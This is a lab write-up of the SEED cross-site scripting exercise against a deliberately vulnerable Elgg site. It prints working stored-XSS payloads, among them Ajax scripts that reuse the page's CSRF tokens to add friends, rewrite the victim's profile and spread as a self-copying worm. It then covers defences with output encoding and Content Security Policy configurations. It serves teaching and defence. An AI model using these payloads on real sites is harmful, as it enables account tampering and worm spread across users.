Cross-site scripting (XSS) attack based on SEEDUbuntu20.04

Posted by aruns on Mon, 27 Dec 2021 06:46:23 +0100

An XSS attack is similar to a CSRF attack, but it is more difficult and more common than CSRF.

CSRF forges a cross-site request: the attacker first has to lure the victim onto a website he has prepared, and when a page redirects to an untrusted third-party site, the site often warns the user about the risk of being attacked. Cross-site scripting is different: it inserts the attacker's code into the pages of a trusted website.

Pop-up windows and intrusive advertisements on unfamiliar websites are often a sign that the site has been compromised and the attacker's malicious code has been implanted in its pages. This is common on abandoned websites, which are vulnerable to attack because nobody maintains them.

I Inject JavaScript code into Elgg

The guinea pig is the Elgg social-networking software, specially prepared for future hackers. If you are not familiar with it, see my previous post:

Cross Site Request Forgery -- CSRF attack experiment report

1. Log in to Samy's account and open the profile page

2. Click Edit HTML in the upper right corner to switch to raw HTML editing mode, and enter the following in the "About Me" field

<script>alert("XSS");</script>

3. Log out

4. Log in to Alice's account and open the "Members" page

5. Open Samy's profile: the malicious JavaScript executes and the XSS alert box pops up
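Output encoding on the server side is the application-level fix for this injection: if Elgg HTML-encoded the About Me field when printing it, the browser would display the script tag as text rather than run it. The following is an added example, not code from this post or from Elgg. renderAboutMeUnsafe() and renderAboutMeSafe() are hypothetical stand-ins for the template that prints the field, and the two payloads are constructed test inputs; the second one goes beyond the post by covering an inline event handler.

```javascript
// Added example, not code from the post or from Elgg: rendering the "About Me" field with
// output encoding so that stored markup such as <script>alert("XSS");</script> is shown as
// text instead of being executed. renderAboutMeUnsafe() and renderAboutMeSafe() are
// hypothetical stand-ins for the template that prints the field.

// Escape the five characters that can change HTML structure or break out of a quoted attribute.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, function (c) { return map[c]; });
}

// Unsafe rendering: the stored field is concatenated into the page as-is, which is what
// lets a payload entered in "Edit HTML" mode run in every viewer's browser.
function renderAboutMeUnsafe(aboutMe) {
  return '<div class="about-me">' + aboutMe + "</div>";
}

// Safe rendering: the field is encoded for the HTML body context before insertion.
function renderAboutMeSafe(aboutMe) {
  return '<div class="about-me">' + escapeHtml(aboutMe) + "</div>";
}

// Check used in tests: does the rendered markup still contain a script element or an
// element with an inline event handler attribute? (A detection heuristic, not a sanitizer:
// the escaped text "&lt;script&gt;" does not match because "<" is no longer present.)
function containsActiveContent(html) {
  return /<script\b/i.test(html) || /<\w+[^>]*\son\w+\s*=/i.test(html);
}

// Constructed inputs: the payload from step 2 above, and an event-handler variant.
const PAYLOAD_SCRIPT = '<script>alert("XSS");</script>';
const PAYLOAD_HANDLER = '<img src=x onerror="alert(1)">';

// Render both payloads both ways and report which outputs still carry active content.
function demo() {
  const report = {};
  [["script", PAYLOAD_SCRIPT], ["handler", PAYLOAD_HANDLER]].forEach(function (entry) {
    report[entry[0]] = {
      unsafe: containsActiveContent(renderAboutMeUnsafe(entry[1])),
      safe: containsActiveContent(renderAboutMeSafe(entry[1])),
    };
  });
  report.safeHtml = renderAboutMeSafe(PAYLOAD_SCRIPT);
  return report;
}

console.log(JSON.stringify(demo(), null, 2));
```

Encoding has to match the context the value is printed into: the map above is for HTML body text and quoted attributes; a value placed inside a URL or inside a script block needs a different encoder. If the About Me field were rendered this way, the text stored in the later steps of this post would be displayed literally and could not run in the viewer's browser.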

II Add Samy as Alice's friend

1. Investigation

Log in to Charlie's account, add Samy as a friend, capture the HTTP request with HTTP Header Live, and analyze its fields to obtain the required information

2. Log in to Samy's account, open the Edit profile page, switch to Edit HTML mode, and paste in the following Ajax code

(if you do not switch to this mode, the editor adds formatting markup to the code)

<script type="text/javascript">
window.onload=function()
{
    // The request is sent with Ajax (XMLHttpRequest) so that it goes out in the background:
    // a normal navigation started from JavaScript would leave the current page and make the user suspicious
    var Ajax=null;

    // Timestamp and secret token, so that Elgg treats the request as a legitimate same-site request
    var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;          // timestamp taken from the current page's JavaScript
    var token="&__elgg_token="+elgg.security.token.__elgg_token; // secret token taken from the current page's JavaScript

    // Build the URL: the add-friend action, the friend ID (59 is Samy's guid), the token and the timestamp
    var sendurl="http://www.seed-server.com/action/friends/add"
                +"?friend=59" + token + ts;

    // Create and send the Ajax request that adds the friend
    Ajax=new XMLHttpRequest();
    Ajax.open("GET",sendurl,true);
    Ajax.send();
}
</script>

Reflection:

If Samy views his own profile page, he will add himself as a friend

3. Log in to Alice's account, view Samy's profile page, and check whether Samy has been added as a friend

As can be seen, the friend was added successfully

III Modify Alice's profile

1. Investigation

Log in to Samy's account, edit the profile, observe the structure of the HTTP request with HTTP Header Live, and obtain the required field information

2. Following the attack steps in II, edit Samy's profile and add the following code in Edit HTML mode

<script type="text/javascript">
window.onload = function()
{
    // Build the form fields
    var name="&name="+elgg.session.user.name;                    // user name of the victim viewing the page
    var guid="&guid="+elgg.session.user.guid;                    // guid of the victim viewing the page
    var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;          // timestamp, read from the current page
    var token="&__elgg_token="+elgg.security.token.__elgg_token; // secret token, read from the current page
    var desc="&description=Samy is my hero" + "&accesslevel[description]=2"; // profile text and its access level (2 = public in Elgg)

    // Build the request body and the URL of the profile-edit action
    var content=token + ts + name + desc + guid;
    var sendurl="http://www.seed-server.com/action/profile/edit";

    if(elgg.session.user.guid!=59) // 59 is Samy's guid: do not modify Samy's own profile
    {
        var Ajax=null;
        Ajax=new XMLHttpRequest();
        Ajax.open("POST", sendurl, true);
        Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        Ajax.send(content);
    }
}
</script>

Log in to Alice's account. Initially, Alice's profile has no content

After she views Samy's profile, the text "Samy is my hero" appears in her About me area. The attack succeeded and Alice's profile page was modified

IV Write a self-propagating worm

1. Write the worm and place it on the attacker Samy's profile page

Here the DOM tree is used to make the JavaScript code copy itself

Change About me on Samy's profile page to the following

Change About me on Samy's home page to the following

<script type="text/javascript" id="worm">
// The script tag carries id="worm" so that the code can find itself in the DOM tree
window.onload = function()
{
    // Build a copy of the worm. innerHTML returns only the content of the script element,
    // not the <script> tags themselves, so the opening and closing tags are added by hand
    var headerTag = "<script id=\"worm\" type=\"text/javascript\">"; // opening tag
    var jsCode = document.getElementById("worm").innerHTML;          // script body, found by id in the DOM tree
    var tailTag = "</" + "script>";                                  // closing tag, split so the HTML parser does not end the script here
    var wormCode = encodeURIComponent(headerTag + jsCode + tailTag); // URL-encode the copy so it can be sent in the form body
    alert(jsCode);

    // Description field (profile text followed by the worm copy) and its access level
    var desc = "&description=Samy is my hero" + wormCode;
    desc += "&accesslevel[description]=2";

    // Remaining form fields
    var name="&name="+elgg.session.user.name;                    // user name of the victim viewing the page
    var guid="&guid="+elgg.session.user.guid;                    // guid of the victim viewing the page
    var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;          // timestamp, read from the current page
    var token="&__elgg_token="+elgg.security.token.__elgg_token; // secret token, read from the current page

    // Build the request body and the URL of the profile-edit action
    var content=token + ts + name + desc + guid;
    var sendurl="http://www.seed-server.com/action/profile/edit";

    if(elgg.session.user.guid!=59) // 59 is Samy's guid: do not modify Samy's own profile
    {
        var Ajax=null;
        Ajax=new XMLHttpRequest();
        Ajax.open("POST", sendurl, true);
        Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        Ajax.send(content);
    }
}
</script>

2. Observe the first-level victim, Alice

Open Samy's profile page, then look at Alice's own profile page and find that it has been modified

3. Observe the second-level victim, Boby

Open Alice's profile page: the worm code pops up in an alert, which shows that Alice's page has been infected with the XSS worm and Boby is now being attacked

Open Boby's profile page and find that it has also been modified. Samy has successfully attacked Boby

V Defensive measures

Content Security Policy (CSP) is used here to prevent XSS attacks

1. Relevant configuration

Three websites, www.example32a.com, www.example32b.com and www.example32c.com, all serve the same HTML file, index.html, which reads as follows

<html>
<h2>CSP Experiment</h2>
<!-- Area 1: inline script with nonce value 111-111-111 -->
<p>1. Inline: Nonce (111-111-111): <span id='area1'>Failed</span></p>
<!-- Area 2: inline script with nonce value 222-222-222 -->
<p>2. Inline: Nonce (222-222-222): <span id='area2'>Failed</span></p>
<!-- Area 3: inline script with no nonce value -->
<p>3. Inline: No Nonce: <span id='area3'>Failed</span></p>
<p>4. From self: <span id='area4'>Failed</span></p>
<p>5. From www.example60.com: <span id='area5'>Failed</span></p>
<p>6. From www.example70.com: <span id='area6'>Failed</span></p>
<p>7. From button click:
<button onclick="alert('JS Code executed!')">Click me</button></p>

<!-- Script 1: nonce value 111-111-111, tries to set the content of area 1 to OK -->
<script type="text/javascript" nonce="111-111-111">
document.getElementById('area1').innerHTML = "OK";
</script>

<!-- Script 2: nonce value 222-222-222, tries to set the content of area 2 to OK -->
<script type="text/javascript" nonce="222-222-222">
document.getElementById('area2').innerHTML = "OK";
</script>

<!-- Script 3: no nonce value, tries to set the content of area 3 to OK -->
<script type="text/javascript">
document.getElementById('area3').innerHTML = "OK";
</script>

<!-- Script 4: runs the file script_area4.js stored on this site -->
<script src="script_area4.js"> </script>

<!-- Script 5: runs the file script_area5.js stored on http://www.example60.com -->
<script src="http://www.example60.com/script_area5.js"> </script>

<!-- Script 6: runs the file script_area6.js stored on http://www.example70.com -->
<script src="http://www.example70.com/script_area6.js"> </script>
</html>

2. Configure CSP

Two methods:

① Have the Apache server set the HTTP response header on every response

② Set the CSP header from within the web application

# www.example32a.com: no CSP
<VirtualHost *:80>
DocumentRoot /var/www/csp
ServerName www.example32a.com
DirectoryIndex index.html
</VirtualHost>

# www.example32b.com: CSP set by Apache in the HTTP response header (method ①)
#   default-src 'self'                : by default, only resources from this site may be loaded
#   script-src 'self' *.example70.com : scripts may come from this site and from *.example70.com
<VirtualHost *:80>
DocumentRoot /var/www/csp
ServerName www.example32b.com
DirectoryIndex index.html
Header set Content-Security-Policy " \
default-src 'self'; \
script-src 'self' *.example70.com \
"
</VirtualHost>

# www.example32c.com: CSP set by the web application (method ②)
# phpindex.php is served as the index page; it sends the CSP header and then includes index.html
<VirtualHost *:80>
DocumentRoot /var/www/csp
ServerName www.example32c.com
DirectoryIndex phpindex.php
</VirtualHost>

phpindex.php

<?php
# Build the CSP header:
#   default-src 'self' : by default, only resources from this site may be loaded
#   script-src ...     : scripts may come from this site and from *.example70.com,
#                        and inline scripts carrying the nonce 111-111-111 may run
$cspheader = "Content-Security-Policy:".
"default-src 'self';".
"script-src 'self' 'nonce-111-111-111' *.example70.com".
"";
header($cspheader);
?>
<?php include 'index.html';?>

3. Test the web pages

(1). Open www.example32a.com

**Observation result:** all areas show OK, and clicking the button opens a pop-up window

**Explanation:** the site has no CSP enabled, so all six scripts executed successfully

(2). Open www.example32b.com

**Explanation:**

According to the CSP configuration of www.example32b.com, only scripts from this site and from example70.com are allowed, so scripts 4 and 6 in index.html executed successfully

Scripts 1 and 2 are inline scripts. Although they carry nonce values, the CSP policy in the HTTP header lists no nonce, so the nonces do not authorize them

Script 3 is inline code and is not executed

Script 5 comes from example60.com, which is not a trusted source, so it is not executed

Button 7 is an inline event handler, which is also inline code and not allowed, so the pop-up does not appear

(3). Open www.example32c.com

**Explanation:**

The CSP configuration of www.example32c.com allows scripts from this site, from example70.com, and inline code carrying the nonce value 111-111-111. The nonce of script 1 matches, so it is executed and area 1 shows OK; script 4 comes from this site and script 6 from example70.com, both trusted sources, so they are executed

The nonce value of script 2 is 222-222-222, which does not match the value required by the CSP configuration, so it is not executed

Script 3 is inline code with no nonce to authorize it, so it is not executed

Script 5 comes from example60.com, which is not trusted, so it is not executed

Button 7 is an inline event handler with no nonce, so the pop-up does not appear

4. Modify the code

(1). Modify the CSP configuration of www.example32b.com (the Apache configuration) so that areas 5 and 6 show OK

# www.example32b.com: CSP set by Apache in the HTTP response header (method ①)
#   default-src 'self' : by default, only resources from this site may be loaded
#   script-src ...     : scripts may come from this site, from *.example60.com and from *.example70.com
# Note: a policy may contain only one script-src directive; a browser ignores a second one
# with the same name, so both hosts have to be listed in a single directive.
<VirtualHost *:80>
DocumentRoot /var/www/csp
ServerName www.example32b.com
DirectoryIndex index.html
Header set Content-Security-Policy " \
default-src 'self'; \
script-src 'self' *.example60.com *.example70.com \
"
</VirtualHost>

(2). Modify www.example32c.com (the corresponding PHP code) so that areas 1, 2, 4, 5 and 6 show OK

<?php
# Build the CSP header:
#   default-src 'self' : by default, only resources from this site may be loaded
#   script-src ...     : scripts may come from this site, from *.example70.com and *.example60.com,
#                        and inline scripts carrying the nonce 111-111-111 or 222-222-222 may run
$cspheader = "Content-Security-Policy:".
"default-src 'self';".
"script-src 'self' 'nonce-111-111-111' 'nonce-222-222-222' *.example70.com *.example60.com".
"";
header($cspheader);
?>
<?php include 'index.html';?>
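The results in 3 and 4 above can be predicted without a browser by applying the CSP rules the way a browser does. The following is an added example, not code from this post or from the SEED lab: a small evaluator for the script-related part of a Content-Security-Policy header. It parses the header (directives separated by ';', sources separated by whitespace, a repeated directive name ignored after its first occurrence), then decides for each of the seven scripts in index.html whether it would run. Assumptions: only 'self', 'unsafe-inline', 'nonce-...' and host sources with an optional leading "*." are handled; schemes, ports and paths are not, and hash sources are only recognised as "present". The policy strings are the ones from this post; CSP_DUPLICATE is a constructed policy that lists script-src twice, which goes beyond the post to show why that does not work.

```javascript
// Added example, not code from the post or the SEED lab: evaluates which scripts of the
// lab's index.html a given Content-Security-Policy header lets run.

// Parse "name src src; name src ..." into {name: [sources]}. Browsers keep only the first
// occurrence of a directive name, so a second script-src in the same policy is ignored.
function parseCsp(header) {
  const policy = {};
  header.split(";").forEach(function (part) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) return;
    const name = tokens[0].toLowerCase();
    if (!(name in policy)) policy[name] = tokens.slice(1); // first occurrence wins
  });
  return policy;
}

// Host-source matching: "*.example70.com" matches "www.example70.com"; otherwise exact host.
function hostMatches(pattern, host) {
  const p = pattern.toLowerCase();
  const h = host.toLowerCase();
  if (p.startsWith("*.")) {
    const suffix = p.slice(1); // ".example70.com"
    return h.endsWith(suffix) && h.length > suffix.length;
  }
  return p === h;
}

// script = {kind: "src", host} for <script src=...>, {kind: "inline", nonce?} for an inline
// <script>, {kind: "handler"} for an inline event handler such as onclick=...
// pageHost is the host the page was loaded from, used for 'self' and relative URLs.
function scriptAllowed(policy, script, pageHost) {
  // script-src governs scripts; when it is absent, default-src is the fallback.
  const sources = policy["script-src"] || policy["default-src"];
  if (sources === undefined) return true; // no governing directive: nothing is restricted
  const keywords = sources.filter(function (s) { return s.startsWith("'"); });
  const hosts = sources.filter(function (s) { return !s.startsWith("'"); });
  const lowerKeywords = keywords.map(function (s) { return s.toLowerCase(); });

  if (script.kind === "src") {
    if (lowerKeywords.includes("'self'") && hostMatches(pageHost, script.host)) return true;
    return hosts.some(function (h) { return hostMatches(h, script.host); });
  }

  // Inline script or inline event handler.
  const hasNonceOrHash = lowerKeywords.some(function (k) {
    return k.startsWith("'nonce-") || k.startsWith("'sha");
  });
  // Nonces are compared case-sensitively; an event handler attribute cannot carry one.
  if (script.kind === "inline" && script.nonce &&
      keywords.includes("'nonce-" + script.nonce + "'")) return true;
  // 'unsafe-inline' allows every inline script and handler, but browsers ignore it
  // as soon as a nonce or hash source is present in the same directive.
  return lowerKeywords.includes("'unsafe-inline'") && !hasNonceOrHash;
}

// The seven scripts of the lab's index.html, as constructed test data.
function evaluatePage(header, pageHost) {
  const policy = parseCsp(header);
  const scripts = {
    area1: { kind: "inline", nonce: "111-111-111" },
    area2: { kind: "inline", nonce: "222-222-222" },
    area3: { kind: "inline" },
    area4: { kind: "src", host: pageHost }, // script_area4.js is a relative URL
    area5: { kind: "src", host: "www.example60.com" },
    area6: { kind: "src", host: "www.example70.com" },
    button7: { kind: "handler" },
  };
  const result = {};
  Object.keys(scripts).forEach(function (k) {
    result[k] = scriptAllowed(policy, scripts[k], pageHost) ? "OK" : "Failed";
  });
  return result;
}

// The headers from this post (www.example32a.com sends none).
const CSP_32B = "default-src 'self'; script-src 'self' *.example70.com";
const CSP_32C = "default-src 'self';script-src 'self' 'nonce-111-111-111' *.example70.com";
// Constructed: script-src written twice; the browser keeps only the first directive.
const CSP_DUPLICATE = CSP_32B + "; script-src 'self' *.example60.com";
// The same intent expressed correctly, in a single directive.
const CSP_MERGED = "default-src 'self'; script-src 'self' *.example60.com *.example70.com";

console.log("32a", evaluatePage("", "www.example32a.com"));
console.log("32b", evaluatePage(CSP_32B, "www.example32b.com"));
console.log("32c", evaluatePage(CSP_32C, "www.example32c.com"));
console.log("duplicate", evaluatePage(CSP_DUPLICATE, "www.example32b.com"));
console.log("merged", evaluatePage(CSP_MERGED, "www.example32b.com"));
```

Run with node; the output for CSP_32B and CSP_32C reproduces the OK/Failed pattern observed in 3, CSP_DUPLICATE leaves area 5 at Failed, and CSP_MERGED turns both area 5 and area 6 to OK. Adding 'unsafe-inline' to script-src would let areas 1 to 3 and the button run again, which is exactly the protection CSP is meant to provide against the injected scripts in sections I to IV.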

5. Summary

CSP lets the website tell the browser explicitly which resources are trusted and may be loaded, so it can prevent an XSS attack from running scripts from untrusted sources on the site

Topics: security Web Security